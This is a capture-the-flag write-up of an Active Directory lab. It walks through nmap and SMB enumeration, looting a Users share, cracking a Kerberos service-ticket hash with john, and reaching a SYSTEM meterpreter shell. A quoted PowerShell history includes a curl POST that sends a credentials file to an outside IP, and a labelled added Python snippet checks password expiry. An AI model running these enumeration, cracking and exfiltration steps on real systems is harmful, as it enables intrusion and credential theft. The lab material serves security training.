```
# Nmap 7.93 scan initiated Sat Feb 11 18:57:36 2023 as: nmap -sSVC -T4 -p- -v --open --reason -oA nmap enterprise.thm
Nmap scan report for enterprise.thm (10.10.193.5)
Host is up, received echo-reply ttl 127 (0.029s latency).
Not shown: 59842 closed tcp ports (reset), 5664 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-02-11 17:58:02Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Issuer: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-10T17:12:19
| Not valid after:  2023-08-12T17:12:19
| MD5:   ed0aeea31749fb2c6dd40b52bb63c434
|_SHA-1: 0e4fc244394805550c9aae137582e60e6fbb238d
|_ssl-date: 2023-02-11T17:58:59+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LAB-ENTERPRISE
|   NetBIOS_Domain_Name: LAB-ENTERPRISE
|   NetBIOS_Computer_Name: LAB-DC
|   DNS_Domain_Name: LAB.ENTERPRISE.THM
|   DNS_Computer_Name: LAB-DC.LAB.ENTERPRISE.THM
|   DNS_Tree_Name: ENTERPRISE.THM
|   Product_Version: 10.0.17763
|_  System_Time: 2023-02-11T17:58:51+00:00
5357/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7990/tcp  open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Log in to continue - Log in with Atlassian account
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49711/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49844/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 11 18:59:00 2023 -- 1 IP address (1 host up) scanned in 83.79 seconds
```
The rdp-ntlm-info module already gives us some DNS information:
```
$ enum4linux-ng -A lab-dc.lab.enterprise.thm
...
 =============================================================
|    Domain Information via SMB session for enterprise.thm    |
 =============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: LAB-DC
NetBIOS domain name: LAB-ENTERPRISE
DNS domain: LAB.ENTERPRISE.THM
FQDN: LAB-DC.LAB.ENTERPRISE.THM
Derived membership: domain member
Derived domain: LAB-ENTERPRISE
...
 =================================================
|    OS Information via RPC for enterprise.thm    |
 =================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
```
Apart from the Windows version, we learned nothing new here.

enum4linux-ng found no shares, and smbmap shows we can connect with a null or guest session but can't enumerate the shares.
```
[+] IP: lab-dc.lab.enterprise.thm:445	Name: unknown	Status: Authenticated
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 967

[+] IP: lab-dc.lab.enterprise.thm:445	Name: unknown	Status: Guest session
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 967
```
But we can successfully retrieve the list at a lower level with
```
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Docs            Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
	Users           Disk      Users Share. Do Not Touch!
SMB1 disabled -- no workgroup available
```
Then I use dolphin to browse the smb shares conveniently: smb://lab-dc.lab.enterprise.thm/Users.
There is a lot of stuff, but we don't have permission for most of it:
```
➜ smbclient '\\lab-dc.lab.enterprise.thm\Users' -U 'WORKGROUP/noraj%fakepass'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Fri Mar 12 03:11:49 2021
  ..                                 DR        0  Fri Mar 12 03:11:49 2021
  Administrator                       D        0  Thu Mar 11 22:55:48 2021
  All Users                       DHSrn        0  Sat Sep 15 09:28:48 2018
  atlbitbucket                        D        0  Thu Mar 11 23:53:06 2021
  bitbucket                           D        0  Fri Mar 12 03:11:51 2021
  Default                           DHR        0  Fri Mar 12 01:18:03 2021
  Default User                    DHSrn        0  Sat Sep 15 09:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 09:16:48 2018
  LAB-ADMIN                           D        0  Fri Mar 12 01:28:14 2021
  Public                             DR        0  Thu Mar 11 22:27:02 2021

		15587583 blocks of size 4096. 9927088 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
```
There are folders related to Bitbucket, but we can't access them. I used a tree command to see what we were able to retrieve, and quickly noticed a PowerShell history file.
```
$ cat LAB-ADMIN/AppData/Roaming/Microsoft/Windows/Powershell/PSReadline/Consolehost_hisory.txt
cd C:\
mkdir monkey
cd monkey
cd ..
cd ..
cd ..
cd D:
cd D:
cd D:
D:\
mkdir temp
cd temp
echo "replication:EDITED">private.txt
Invoke-WebRequest -Uri http://1.215.10.99/payment-details.txt
more payment-details.txt
curl -X POST -H 'Cotent-Type: ascii/text' -d .\private.txt' http://1.215.10.99/dropper.php?file=itsdone.txt
del private.txt
del payment-details.txt
cd ..
del temp
cd C:\
C:\
exit
```
We can't connect with those creds anywhere (tried LDAP, WinRM and RDP too):
```
$ smbclient '\\enterprise.thm\Docs' -U 'WORKGROUP/noraj%fakepass'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Mar 15 03:47:35 2021
  ..                                  D        0  Mon Mar 15 03:47:35 2021
  RSA-Secured-Credentials.xlsx        A    15360  Mon Mar 15 03:46:54 2021
  RSA-Secured-Document-PII.docx       A    18432  Mon Mar 15 03:45:24 2021

		15587583 blocks of size 4096. 9926354 blocks available
```
Those two documents are password-protected, and the password from the PowerShell history doesn't work here either.
```
[-] Users with old password
[!] Username: Administrator		Password last change: 702 days ago 2021-03-11 21:23:37
[!] Username: atlbitbucket		Password last change: 702 days ago 2021-03-11 22:52:53
[!] Username: krbtgt		Password last change: 701 days ago 2021-03-12 00:31:21
[!] Username: ENTERPRISE$		Password last change: 701 days ago 2021-03-12 00:41:22
[!] Username: bitbucket		Password last change: 701 days ago 2021-03-12 01:20:01
[!] Username: nik		Password last change: 701 days ago 2021-03-12 01:33:25
[!] Username: replication		Password last change: 701 days ago 2021-03-12 03:01:41
[!] Username: spooks		Password last change: 701 days ago 2021-03-12 03:35:24
[!] Username: korone		Password last change: 701 days ago 2021-03-12 03:36:10
[!] Username: banana		Password last change: 701 days ago 2021-03-12 03:37:11
[!] Username: Cake		Password last change: 701 days ago 2021-03-12 03:39:42
[!] Username: contractor-temp		Password last change: 701 days ago 2021-03-12 03:44:27
[!] Username: varg		Password last change: 701 days ago 2021-03-12 03:45:57
[!] Username: joiner		Password last change: 698 days ago 2021-03-15 01:15:38
[-] Users with an interesting description
[*] Username: contractor-temp		Change password from EDITED
[-] Users with not the default encryption
[*] Username: krbtgt		Password is in a reversible encryption or in DES !
[*] Username: bitbucket		Password is in a reversible encryption or in DES !
[-] Protecting Privileged Domain Accounts
[!] No entry found !
[-] Not Default Attributes (TEST IN BETA)
[!] No entry found !
[-] Laps Password
[!] No entry found !

====================================================
==================== Attack AD =====================
====================================================
```
The replication password is 701 days old, the account does not have the Password Never Expires attribute, and the password policy sets a maximum age of 42 days, so the account is expired and the password must be changed (but we can't).
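The expiry reasoning above, written out as a check a defender could run over exported AD attributes (pwdLastSet, userAccountControl and the domain's maxPwdAge). This is an added example, not code from the original write-up or from the audit tool whose output is shown; the account entries, the svc-example account name and the assumption that the timestamps are UTC are constructed, and only the 701-day age, the 42-day policy and the replication timestamp come from the post.

```python
"""Added example: apply the write-up's password-expiry reasoning to raw AD
attribute values. Entries below are constructed; only the numbers
(42-day maxPwdAge, replication's pwdLastSet, 701-day age) come from the post."""
from datetime import datetime, timedelta, timezone

# pwdLastSet is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC.
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
DONT_EXPIRE_PASSWORD = 0x10000  # userAccountControl bit (UF_DONT_EXPIRE_PASSWD)

def filetime_to_datetime(ticks):
    return _EPOCH_1601 + timedelta(microseconds=ticks // 10)

def datetime_to_filetime(dt):
    delta = dt - _EPOCH_1601  # integer arithmetic to avoid float rounding
    micros = (delta.days * 86400 + delta.seconds) * 1_000_000 + delta.microseconds
    return micros * 10

def max_pwd_age_days(max_pwd_age):
    """The domain's maxPwdAge is stored as a negative 100 ns interval."""
    return -max_pwd_age / 10_000_000 / 86400

def password_age_days(pwd_last_set, now):
    return (now - filetime_to_datetime(pwd_last_set)).days

def password_expired(pwd_last_set, uac, max_pwd_age, now):
    if uac & DONT_EXPIRE_PASSWORD or max_pwd_age == 0:  # flag set, or no maximum
        return False
    if pwd_last_set == 0:  # "must change password at next logon"
        return True
    return password_age_days(pwd_last_set, now) > max_pwd_age_days(max_pwd_age)

def stale_accounts(accounts, max_pwd_age, now):
    """sAMAccountNames whose password is past the policy's maximum age."""
    return [a["sAMAccountName"] for a in accounts
            if password_expired(a["pwdLastSet"], a["userAccountControl"], max_pwd_age, now)]

# Constructed sample: the post's 42-day policy and replication timestamp, plus a
# hypothetical service account that carries the never-expires flag.
MAX_PWD_AGE_42_DAYS = -42 * 86400 * 10_000_000
NOW = datetime(2023, 2, 11, 18, 0, tzinfo=timezone.utc)  # date of the scan
PWD_SET = datetime_to_filetime(datetime(2021, 3, 12, 3, 1, 41, tzinfo=timezone.utc))
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "replication", "userAccountControl": 0x200, "pwdLastSet": PWD_SET},
    {"sAMAccountName": "svc-example", "userAccountControl": 0x200 | DONT_EXPIRE_PASSWORD,
     "pwdLastSet": PWD_SET},
]
```

Running `stale_accounts(SAMPLE_ACCOUNTS, MAX_PWD_AGE_42_DAYS, NOW)` returns only `replication`, since the flagged account is exempt from the policy.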
```
$ john kerbHash.hash -w=/usr/share/wordlists/passwords/rockyou.txt --format=krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
EDITED           (?)
1g 0:00:00:01 DONE (2023-02-12 00:01) 0.6896g/s 1083Kp/s 1083Kc/s 1083KC/s livelife92..liss23
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 5720 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1817]
(c) 2018 Microsoft Corporation. All rights reserved.
```